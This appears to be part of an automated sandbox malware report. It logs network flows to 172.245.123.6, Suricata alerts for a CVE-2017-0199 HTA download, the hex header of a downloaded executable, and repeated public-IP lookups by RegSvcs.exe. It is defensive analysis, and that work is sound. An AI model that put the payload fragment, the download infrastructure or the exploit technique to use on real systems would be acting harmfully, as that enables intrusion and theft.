Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49166
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49166 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 172.245.123.6:80 -> 192.168.2.22:49167
Source: global traffic TCP traffic: 192.168.2.22:49167 -> 172.245.123.6:80

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49166 -> 172.245.123.6:80
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49164 -> 172.245.123.6:80
Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.6:80 -> 192.168.2.22:49166
Source: Network traffic Suricata IDS: 2024197 - Severity 1 - ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199) : 172.245.123.6:80 -> 192.168.2.22:49164
Source: Network traffic Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49172 -> 172.245.123.6:80
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 30 Sep 2024 08:12:30 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Mon, 30 Sep 2024 05:51:09 GMTETag: "fb241-6234fca9f391a"Accept-Ranges: bytesContent-Length: 1028673Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/lnkData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 2d 82 c1 ed 69 e3 af be 69 e3 af be 69 e3 af be d4 ac 39 be 6b e3 af be 60 9b 3a be 77 e3 af be 60 9b 2c be db e3 af be 60 9b 2b be 50 e3 af be 4e 25 c2 be 63 e3 af be 4e 25 d4 be 48 e3 af be 69 e3 ae be 64 e1 af be 60 9b 20 be 2f e3 af be 77 b1 3a be 6b e3 af be 77 b1 3b be 68 e3 af be 69 e3 38 be 68 e3 af be 60 9b 3e be 68 e3 af be 52 69 63 68 69 e3 af be 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 87 cf 93 4b 00 00 00 00 00 00 00 00 e0 00 23 01 0b 01 09 00 00 02 08 00 00 d6 01 00 00 00 00 00 10 63 01 00 00 10 00 00 00 20 08 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 0b 00 00 04 00 00 35 21 0a 00 02 00 00 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c cd 08 00 54 01 00 00 00 b0 0a 00 98 92 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 40 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 00 08 00 00 10 00 00 00 02 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 5c d9 00 00 00 20 08 00 00 da 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a5 01 00 00 00 09 00 00 68 00 00 00 e0 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 98 92 00 00 00 b0 0a 00 00 94 00 00 00 48 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 132.226.8.169 132.226.8.169
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
May check the online IP address of the machine
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: reallyfreegeoip.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe DNS query: name: checkip.dyndns.org
